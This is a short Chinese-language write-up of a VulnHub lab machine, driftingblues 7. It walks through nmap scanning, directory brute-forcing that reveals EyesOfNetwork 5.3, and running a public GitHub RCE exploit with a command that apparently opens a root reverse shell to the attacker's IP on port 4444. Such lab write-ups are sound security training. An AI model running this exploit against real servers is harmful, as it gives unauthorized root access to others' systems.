Vulnhub靶机:driftingblues 7

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:driftingblues7(10.0.2.23)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/

二、信息收集

使用nmap主机发现靶机ip:10.0.2.23

Vulnhub靶机:driftingblues 7_第1张图片

使用nmap端口扫描发现靶机开放端口:22、80、111、443、3306、8086

Vulnhub靶机:driftingblues 7_第2张图片

访问网站发现访问80端口会跳转到443端口,443端口安装的网站为EyesOfNetwork

Vulnhub靶机:driftingblues 7_第3张图片

使用dirsearch爆破目录,发现/bower.json,可以看到EyesOfNetwork的版本为5.3

Vulnhub靶机:driftingblues 7_第4张图片

找了一圈没发现其他信息,尝试找找EyesOfNetwork是否有历史漏洞可以利用。发现一个exp:https://github.com/h4knet/eonrce

Vulnhub靶机:driftingblues 7_第5张图片

三、漏洞利用

将该exp下载下来,执行利用,直接获取到root权限的shell

python eonrce.py https://10.0.2.23/ -ip 10.0.2.15 -port 4444

Vulnhub靶机:driftingblues 7_第6张图片

获取flag,只有一个flag

Vulnhub靶机:driftingblues 7_第7张图片

你可能感兴趣的:(靶场,web安全)